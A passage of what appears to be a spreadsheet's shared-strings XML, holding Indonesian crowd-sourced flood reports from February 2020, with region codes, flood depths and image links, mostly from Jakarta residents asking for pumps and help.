    <t>{ "district_id": "3175", "local_area_id": "2522", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di Pegangsaan dua, sudah sampai selutut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ykCyao0pp9BLIwPIzNPG4QGpWmjHWtX0BnNYSWU0-ae6qiPuGY0dC-b0fE2a0PUpYvHZWm567akjkcmsPJlNy1Guzpa8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1772", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#gotmeluap karena #KaliMeluap di Jl. Cipinang Jaya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RznjF3aH8ei-qxA67A4ev-82EuhnV1FIQtrEbdreWZuMMVRl9NexP2yEft1v6I_G4w4r88dbnvB1MhBlE1Z4hAjVgJvB=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap .. tolong pompa di buka segera untuk kartini raya banjir tinggi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/d7p3B35bg4WlMWS6IJ8BKeFTd6HTkFH7q5D54O4ulBv2bX2LO_pDakqlSTxgiueI0BjhZZojMfjfWV4NIi3xtxTc-nMZ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1146", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon solusi penanganan, dan pencegahan banjir. #KaliMeluap</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/S1P-H2LmZopxEENfwvwI8SERT0MqDK_AJ03RTLwz9W6C2pal-sr8dLGIdMKFdS_7VBnG93g3zfIJU84CBfq_wg31G7Al=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1705", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong banjir nih, jangan pas undah surut baru pada dateng dan poto2 hehehe</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xH7dc1X057dhkPE4K2qUzsPoqZqxYHObFcgf96AwFa4lZhTsnCVjNZyzmWCsMBjarr_MDCv1uq3i_RcWZsphLcUsLVSs=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "652", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir RW 07 Kebon Sirih</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/g8K6KSkbf3mZTsVWKJqnXwYCnKO6-ADFgJdgqRgC3jxG7_l3K-gRTMQVzyhPKPTUX0M6lzXUHYEt_sk4GyPtw0Xg6u_4=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1416", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap Pak tolong banjir nya sdh tinggi,dsini banyak balita dan anak",</t>
  </si>
  <si>
    <t>Cakung Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/m6cZaWiC_HGNz9qQoLIthFdgDM9--3Mp-FEvMIMk-Ra45ZnByE-ZsMMpnoTK7PQ8bpt8fnTs1vvM9QRxdbq4PBQ4UZ3E=s480-c</t>
  </si>
  <si>
    <t>tolong pak gubernur DKI. banjiiiiiiiiiiiiiiiiir lagi pak. kasian para manula dan balita. tolong pak gubernur. kali kinanta. kelurahan Pisangan timur. jaktim</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/JoHw6pV0jz0FCaQ9umggBZeJ7HU0r2OEnhNwMXuKTEiHlWKLcHoQ9iz3e6ghcJAFqRssB4exEUB_NKZTeyqTYrOT6TI=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2689", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dulu 5 Tahun 1x Banjir.. Sekarang, 2 Bulan Sudah 4x Banjir..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cWJQl_ARznBkFh2Rge3ExHriU0Qg7HAecSr2VxNzmaaqBn9hlRERHikkiqBKjFGdvZvQ3he_ygsXS4stZ7wlDdbfJvGn=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "116", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>masih teegenang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OO8X5g1D2WCid1dFADx7n8eg5eAzvLqvDYvHIvoYFzcNHSeV3SPazhhhfVZh-q2veW_mM9EUH9KkR0lNtbqpBnJUoeQMBA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1637", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir daerah penganten ali gang palem 1 ciracas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jBIaamgAJmkl3T9RkA8gCSpo5U1SmsNDYGG8sK8hQf9oYgtGM9R1vGQ7UxeU0a0vGL1Q5jW7vT7i3_tlJ8eeWQC1JCs=s480-c</t>
  </si>
  <si>
    <t>tolong dong pompa air di daerah sunter di nyalakan. Dari aplikasi pantau bajnjirz pompa air di daerah sunter tidak ada yang menyala. Banjir 15cm</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RvXHrWbj6AbeOR1fk7IbLiTxdwSt1p0yqmrae8vKct6KIKIJ3_eGHY8dDptlPxxJ9d8rnTdeKVG385jXI0YumTL0ajlA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1431", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirBandang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/K2TMdS3DE340rHuGJ4_CeGPgLj2Gi7O4Fpyoc5yKW1tVYx_351CtX1tQdtqExc7KORVStL5eqXnlpxpfw83lA1XqHVQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1470", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pulogebang indah banjir lg,</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/f2S7kV9uyeR5yY5jwAY6_Mqyk5p6SFsC8yPcmbfWR3PyNRKG9R2ZDIQwX5_76iDxJ5R824fiOecmgmvTiQVUWD_RHXU=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2455", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/utW588kgUVEWHu7hUqL4tyLsOWkOMFilRJ9a8EmVx5JINUr8DVYdrUy1RRmR-g_pZZOKvemA98N_TMMqd19W9YBpgh8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1946", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>BANJIR di Pramuka bhakti IV.  no. 25. Air sedengkul memasuki rumah mohon segera pinjamkan mesin sedot / mesin pompa air tidak bisa kluar karena posisi jalan lebih tinggi dari rumah. trimakasih"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vkxkzGkxd7eUmt2_odx1wZes6MBCIu1g_pIYdp9Hzw55Exd4zhEyzdBc_uCWRRbHCU_xhYr1twaqkQCdaZsrmEEGLMk0=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1723", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pondok Kopi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/WHUL_TgQf6mYD6BbtmoJPA_ELrxJ5ASosvo1bpeH1LovJK99XIQgNyi9JKURbzxXBAzT4V9G7xwSp3Nfi3sWEBoZMqU=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2577", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dulu Dalam 5 Tahun 1x Banjir.. Sekarang Dalam 2 Bulan Sudah 4x Banjir..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IfeLZWuyR3s3BArvgLJyeMuXdvqUV2B1npLBEZgUQ0MxBKeDEKYKmNInP42_5s4ApSE-TG6PYj5xCY_z__Z42EAqSlBp=s480-c</t>
  </si>
  <si>
    <t>banjir di rt002/04 Kel Jatinegara tolong PPSU</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mG42M7iK-Ff-iwqUp7srK3VABn3PLEt5uLXkyKPteDsiiapawHGKlQc-BTc7zEQ_yQMd8TxGQ1iOMYptuZNLnveku5Zn=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tolong pompa hidup gak nih daerah saya taman kota gang kedaung #KaliMeluap</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bog87C_bAvGocHpi7QWJN1BxuMgj-y733qL-gjg63aazUlUUQXIkqi51hMe71Y0qHoxjeL0-plr2C7ywh3aPCeG6ssMXig=s480-c</t>
  </si>
  <si>
    <t>n banjir, got yang kecil tidak dapat menampung volume air.. mohon bantuan dari badan terkait.. terima kasih</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Dr2bAW4ithKRsgSJn7WDreLJHfJ5q2xc3UJn9WCMXJP8WxQ_Qq6jCzJ7vvnZstJv0UovfW9cjOgC5aqH3v3waKOLqi_2=s480-c</t>
  </si>
  <si>
    <t>#BanjirBandang #KaliMeluap banjir 3 hari belum surut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/zI9Y9BsRrgVe8Wi0x_3BPtv0hllZoJrhIbyfvj4JWZQI87dPm1YL7qUWtW1Aw6Hc2PgoG6xUDFfo3sL1qkIEZ6VqCfO4SQ=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/uaMz_Vegy_edB1bIlefzuUy4Qx2ESe52zzq1qneJQClDLV9DO2O2en1gMcee8lXGLsV_XhEbFvblkssRvCZYQKRG7Ljl=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1829", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#kecamatan Kramatjati #kelurahan kp tengah SDH 2 tahun kamiwarga RT 07 RW 03 mengalami kebanjiran tapi TDK pernah ada solusi dan tindakan pejabat setempat ..mohn diperhatikan pak !! trimakasih"</t>
  </si>
  <si>
    <t>Kampung Tengah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/zfGNvOSxA-0FqAbcvlpykBOxL1AfiuLVOa8jdixVQgNEej35fYP8ft-ntFhVYdScaKZr3mkdrZJfQ99d_2EgLfJEUDp1=s480-c</t>
  </si>
  <si>
    <t>Banjir masuk lagi min di Taman Malaka Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/oZpjwtN0-In0-yOqXegzOBkZgHxyUVUKkd9hQNB5HDyhIDC0RZvaDRhfAAhckm2l2uc1QiMzaCT0Cnun0BWrJw8xVjt9=s480-c</t>
  </si>
  <si>
    <t>banjir hampir tiap hari.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jRUnqs6fKURsshIAckjlMnG9oC0Qh_6FH6qhreF8o1L7-Lt_tmp7dvp15taalwZ2obQosQ9513EpZFCk9jTtQKXUgeM=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1626", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKiriman #BanjirBandang #BanjirKecil #KaliMeluap Hanafi RT.001/03 CIRACAS Jaktim Air semakin mantap alirannya naik dengan cepat.. Disini Ada Ibu2 Hamil &amp; Ada Yang punya Anak Bayi juga."</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/v16cwXONwbvkvwrIIR9tQt4EnYBsX0da8kOYwJFUwZvMlcjtRRoauKUCTHuTBFOmDYWLyUCkyzvqz0qsRF5oxvy3oC0=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2642", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pompa 5 bukit duri Hanya berfungsi panel 50 yg kapsitasnya kecil. sdh dibantu alat penyedot tambahannnamun jg tdk mampu menanggulangi lumpahan air (bahkan mesint tambahan dimatikan krn pans. mohon mobil pompa untuk pompa  krn kondisi panel.pompa 5 yg ber</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RKNfxFHOoDmabHjaHBYboo3Y0dJhNH8XlNFUGL_cpRq72qh6qNb779U3sJJdkniq7MGx7nMJiFTnBKwDT6n5Z88r-Nxuqw=s480-c</t>
  </si>
  <si>
    <t>Banjir di Perumahan Pondok Sani , Pejuang, Medan Satria, Kota Bekasi. Sudah 4 kali terjadi selama 2020. Tertinggi sepinggang orang dewasa. Ketinggian saat ini sedengkul orang dewasa dan terus naik. #Banjir #Bekasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/kJlG7wcmFVLFUD78zxOGRsV65gAqIJRmHcH_VcxyqhgJ4vHFJDeroex9SGGYvpspmvHiKln52oHjVm2qptj1Cel1pJzm=s480-c</t>
  </si>
  <si>
    <t>Warga RT01 &amp; 02 RW04 Cipinang Melayu  kembali kebanjiran ketinggian air saat ini sedada orang dewasa &amp; kondisi saat ini masih hujan #KaliMeluap #BanjirBandang #BanjirKiriman #hujanintensitastinggi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/A8UOBSabvuZIwRHRqi5fDaF8d-dnEYH4MPnk_Jc5p9-kJhvcius-rfzsA6r7r7c5uDFjYhdpxdihIWvjoxgZUIIL9jpjug=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1912", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap sudah lapor ke rt tapi tidak ada tindakan dari rt untuk membuat saluran air</t>
  </si>
  <si>
    <t>Pinang Ranti</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ULa9Gbdvlc1VOZ2pO_-6ouu3meOG23Vsb9a0ERureGkrAhLdeTjvpVTgT1U47pguQli09IHW_xo0V5PwAYPBzN2McAzw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1879", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong Pemda DKI, tiap kali hujan daerah kami banjir...</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/a1sCSSb-bK6SAJr0m2zMjLEVazX0g9FH2LACnbUgQXMpnuk5B-Ms7c0eelfHVDnRPrLbBMnoMtHArN-AfOBxV5HVRPRI=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2072", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>setiap kali hujan turun agak lama wilayah RW11 kelurahan Jati selalu banjir, kontur wilayah kami memang lebih rendah dibanding sekitarnya, biasanya aliran air cepat sehingga bisa surut namun belakang genangan tidak cepat surut malah menjadi banjir yg mas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Esn342Vc5DZ_7JA0f0rwMMnngOfZTj3jxki39FZCRO-dlSpjd4uxIGcRkTT2dwIwhzhI5I79VMJNloyAe06yASCeijw=s480-c</t>
  </si>
  <si>
    <t>pak gubernur Daerah Khusus Ibukota Jakarta. tolong pak.. warga kebanjiran terus. ada yang tidak beres dengan kali kinanta. kasian para manula pak. tooollooooooonnggg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/HELvAjdt8L7AX3B_OyJk8htrlA8iutD-P5xPHe4nvbTyMeOAhGS_vWYrMXRCmSjuHR0lsR9_m35chqw1i5dDOp0d1psz5A=s480-c</t>
  </si>
  <si>
    <t>tolong pak gubernur DKI. saya dan warga kebanjiran terus setiap hujan besar. tolong bereskan permasalahan kali kinanta di kelurahan Pisangan timur. tolong pak. hanya Allah yang bisa membalasnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/oMWQ1NIMvT7BT3I1w24mLw1q_sqANRXqFIkMRqUaH54Car36SgPTy_UjO6oCjq8K2tF9OcUvU-pVtTOHed69eidfgNoD=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2146", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#SaluranTersumbat #banjir sampe hari ini masih terjadi genangan belum ada tindak lanjut"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/S_a2UXCG6nKgl3RTS9jZnS0smuDbAoXjFvNPYsMG4NC4vqYibM9pdqUs6KKatcZAG6Ks-uOId1F2j20Cl5_Z2sh1gs2q=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2054", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir air tdk mengalir kekali"</t>
  </si>
  <si>
    <t>Cipinang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/JV752gN7lz1tVp8ihOQF84ck06H93NU8IDR8zy3i6xDY6bnPvd3IbwFmimmzGccSMoB2svzI1PEawOZbENhznzSHT1eHcw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "808", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>laporan saya kemaren tidak di konfrimasi main selesai saja, mohon pemprov lebih serius lagi menerima laporan masyarakat, tolong ketika laporan petugas lansung mencari tahu penyebab, ini tanggul sudah 3 hari jebol, berakibat banjir parah di jl ungaran uju</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GOVEXCWQAGry1UkVlXkwoQnuxnE0RoubZ74RwjPlyHxEoPSs147aIMtoFyBs_vRWZz7eyin8GsyF94O3xgNFHY-_VDD4Jw=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman  banjir 2 hari belum surut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lxQ_NTWZu3ijw0InnSqfp3V3aWcpn1ilGdgT2hvD90swB_oXXHnXQU5DhMLq6tRE-yFwwKmM37XaAWruGlnZCKKpzGTj=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirBandang #BanjirKiriman #BanjirKecil air semakin besar. mesin rumah pompa masih kurang untuk menyedot luapab air. pompa tambahan tidak bisa digunakan. tolong kirim pompa mobil segera ke rumah pompa 5, gang 9. URGENT</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/EcIrmx8V_LK44ubc3P1TbD7uf_osbjAkdzjltJIzdqcUcpMvwAwIPGAnL8fYJ86FXKW2QkXFECjczbq7h0srVNnFvYvL8Q=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1059", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>disini setiap kali hujan selalu banjir, tidak ada penanganan satu kali pun dari pemerintah setempat</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349172</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/17/349172-1581912242180641371.mp4-03.jpg</t>
  </si>
  <si>
    <t>Drainase Tak Berfungsi, Jalan Imam Bonjol Tergenang Air</t>
  </si>
  <si>
    <t>Akibat drainase tidak berfungsi, Jalan Imam Bonjol Cibitung tergenang air setinggi 10 cm.</t>
  </si>
  <si>
    <t>Telagamurni</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349184</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/17/15819307991175582863.jpg</t>
  </si>
  <si>
    <t>Usai Hujan, Air Selokan di Jl Kolonel Ahmad Syam Meluber</t>
  </si>
  <si>
    <t>Usai hujan deras, air selokan terlihat meluber ke jalanan yang berada di Jalan Kol. Ahmad Syam, Desa Sayang, Jatinangor, Sumedang, Senin (16/02/2020) sore. Jalan ini merupakan jalan alternatif dari Kec. Jatinangor, Sumedang dengan Kec. Rancaekek Kab. Ban</t>
  </si>
  <si>
    <t>Cikeruh</t>
  </si>
  <si>
    <t>Jatinangor</t>
  </si>
  <si>
    <t>c9606716-6025-4056-add3-986b8b94751b</t>
  </si>
  <si>
    <t>Banjir di kopo sayati</t>
  </si>
  <si>
    <t>Margahayu Selatan</t>
  </si>
  <si>
    <t>Margahayu</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349187</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/17/15819361901162657025.jpg</t>
  </si>
  <si>
    <t>Air Sungai Cikeruh Meluap, Dataran Rendah Sekitar Terendam</t>
  </si>
  <si>
    <t>Sore ini sungai Cikeruh kembali meluap, akibatnya daerah yang lebih rendah seperti daerah Dangdeur Kec. Rancaekek terendam banjir, Senin, (16/02/2020). Terlihat air sungai sangat kotor.</t>
  </si>
  <si>
    <t>8d5e4d09-432a-481a-9a93-393b0c2607a3</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 49 }</t>
  </si>
  <si>
    <t>Banjir ey</t>
  </si>
  <si>
    <t>Mekarjaya</t>
  </si>
  <si>
    <t>6301c02d-3f23-4d4c-afc2-9c00f717dcf6</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 3 }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "605", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>becek</t>
  </si>
  <si>
    <t>Danau Sunter</t>
  </si>
  <si>
    <t>1debf612-a2c6-4d1d-8f92-892b792df235</t>
  </si>
  <si>
    <t>Hujan sejak sore tidak berhenti, potensi air menggenang</t>
  </si>
  <si>
    <t>d9eb102c-87ff-4c08-9a58-a9751077007d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9eb102c-87ff-4c08-9a58-a9751077007d.jpg</t>
  </si>
  <si>
    <t>#SARJepara Akibat hujan semalam"</t>
  </si>
  <si>
    <t>Kauman</t>
  </si>
  <si>
    <t>Jepara</t>
  </si>
  <si>
    <t>fe75c34a-22d4-47b9-9133-d3c019c5ec18</t>
  </si>
  <si>
    <t>Genangan sering sekali</t>
  </si>
  <si>
    <t>6918e92d-413e-4bd6-a6d3-2b9f48746de5</t>
  </si>
  <si>
    <t>Narogong dan rawalumbu banjir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349282</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/20/15821665531606648898.jpg</t>
  </si>
  <si>
    <t>Jalan Pati-Tayu Banjir, Beberapa Kendaraan Mogok</t>
  </si>
  <si>
    <t>Di jalan Pati - Tayu Kabupaten pati, tepatnya di jembatan RS.fastabig banjir setinggi roda mobil bahkan lebih motor yg nekat terjang banyak yang mogok mending puter balik lewat bapoh- tlogowungu- pati walaupun ada banjir juga tapi tidak terlalu parah...s</t>
  </si>
  <si>
    <t>Winong</t>
  </si>
  <si>
    <t>Pati</t>
  </si>
  <si>
    <t>94330e13-ad1d-46dd-9214-7cc731ade36b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94330e13-ad1d-46dd-9214-7cc731ade36b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4059", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir untuk daerah tlogosari, kec. Pedurungan, kota semarang, mencapai mata kaki orang dewasa, banjir belum surut karna hujan masih mengguy</t>
  </si>
  <si>
    <t>Muktiharjo Kidul</t>
  </si>
  <si>
    <t>Pedurungan</t>
  </si>
  <si>
    <t>8c570976-e37b-489a-8ee7-fd0035a4ad6a</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2956", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>posko banjir kebanjiran</t>
  </si>
  <si>
    <t>Tawangmas</t>
  </si>
  <si>
    <t>Semarang Barat</t>
  </si>
  <si>
    <t>6640c501-1f08-4a81-aa2c-3cc553ee615e</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4058", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>banjir di muktiharjo kidul</t>
  </si>
  <si>
    <t>7c8880ef-04c5-4957-96f9-970ba8be8a8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c8880ef-04c5-4957-96f9-970ba8be8a8e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4072", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Air didlm rumah hampir sebetis, diluar rumah hampir selutut orang dewasa</t>
  </si>
  <si>
    <t>fffea284-b264-4ea5-a341-b747332dd1e7</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "658", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir tadah hujan.</t>
  </si>
  <si>
    <t>7d7e30f5-a798-4aa8-a03b-99f674b67f34</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "56", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir gara2 waduknya rusak gk bisa nyedot air</t>
  </si>
  <si>
    <t>Tomang</t>
  </si>
  <si>
    <t>59a9253a-9b9c-4b6f-b39a-9c5a5ee5a521</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SS" }</t>
  </si>
  <si>
    <t>*Banjir* *Waktu Kejadian* *Hari / Tanggal*: Sabtu 22 Februari 2020 *Jam* :  07:30  WIB *Lokasi* : Tanah Abang Utara dan curup"</t>
  </si>
  <si>
    <t>Curup</t>
  </si>
  <si>
    <t>Penukal Abab Lematang Ilir</t>
  </si>
  <si>
    <t>011471a4-576a-43b4-9f22-dae66daf6824</t>
  </si>
  <si>
    <t>https://images.petabencana.id/011471a4-576a-43b4-9f22-dae66daf6824.jpg</t>
  </si>
  <si>
    <t>Banjirr informatika ITS. Kampus ada mahasiswa sipil dkk harusnya bisa mengatasi banjir sendiri</t>
  </si>
  <si>
    <t>Keputih</t>
  </si>
  <si>
    <t>Sukolilo</t>
  </si>
  <si>
    <t>a74ec92f-f363-49f1-b3c2-726c3f8431f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a74ec92f-f363-49f1-b3c2-726c3f8431f9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 12 }</t>
  </si>
  <si>
    <t>Jalan DR Kusuma Atmaja RT 10 RW 4 Kel. Menteng Jak Pus.</t>
  </si>
  <si>
    <t>77d2b216-8dc5-4217-bfd9-c5752d136ef9</t>
  </si>
  <si>
    <t>Hujan deras disertai petir. Banjir sebetis hingga selutut orang dewasa</t>
  </si>
  <si>
    <t>cc441c6e-bdc7-4c90-87b4-fe5d082c71c4</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 68 }</t>
  </si>
  <si>
    <t>c227b287-1f1b-4a32-8fa6-c0cf556302e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c227b287-1f1b-4a32-8fa6-c0cf556302e8.jpg</t>
  </si>
  <si>
    <t>Banjir sudah mencapai lutut orang dewasa</t>
  </si>
  <si>
    <t>33545208-10ec-4448-86f0-534390d85d3a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/33545208-10ec-4448-86f0-534390d85d3a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1327", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air sudah masuk kerumah warga</t>
  </si>
  <si>
    <t>90eeffba-586b-43b9-8c46-3cfce8a7fd66</t>
  </si>
  <si>
    <t>https://images.petabencana.id/90eeffba-586b-43b9-8c46-3cfce8a7fd66.jpg</t>
  </si>
  <si>
    <t>banjir di gading arcadia Pegangsaan Dua Kelapa Gading Jakarta Utara</t>
  </si>
  <si>
    <t>eaf9310c-b8c6-406f-b32b-5517519ee3b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eaf9310c-b8c6-406f-b32b-5517519ee3b1.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 11 }</t>
  </si>
  <si>
    <t>Banjir Harapan Indah, Kel Pejuang, Kec. Medan Satria</t>
  </si>
  <si>
    <t>ea2e2838-022e-4419-b3f6-dbb367f11564</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2178", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Alamat rumah jl. Rorotan 9 no. 56 rt. 010/007 kelurahan rorotan kecamatan cilincing, disana ada ibu saya terjebak banjir sendirian.</t>
  </si>
  <si>
    <t>3f0b68cf-e4ef-46a9-8cd7-45aefcafaaa9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f0b68cf-e4ef-46a9-8cd7-45aefcafaaa9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2170", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Perumahan green garden Rorotan</t>
  </si>
  <si>
    <t>ddb2230e-0909-4ba1-a533-71a01a3cafe3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ddb2230e-0909-4ba1-a533-71a01a3cafe3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "552", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kampung Rawa</t>
  </si>
  <si>
    <t>081abbc6-df04-40c5-8f3f-49ea70d2225a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/081abbc6-df04-40c5-8f3f-49ea70d2225a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2078", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2472f42e-ac18-4339-a34e-50c795f9d8ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2472f42e-ac18-4339-a34e-50c795f9d8ff.jpg</t>
  </si>
  <si>
    <t>Cluster Ifolia Kota Harapan Indah Bekasi banjir di jalanan sekitar 50cm.</t>
  </si>
  <si>
    <t>f1fe8265-2d3f-43cf-8ba1-bd3b51ba8f84</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 91 }</t>
  </si>
  <si>
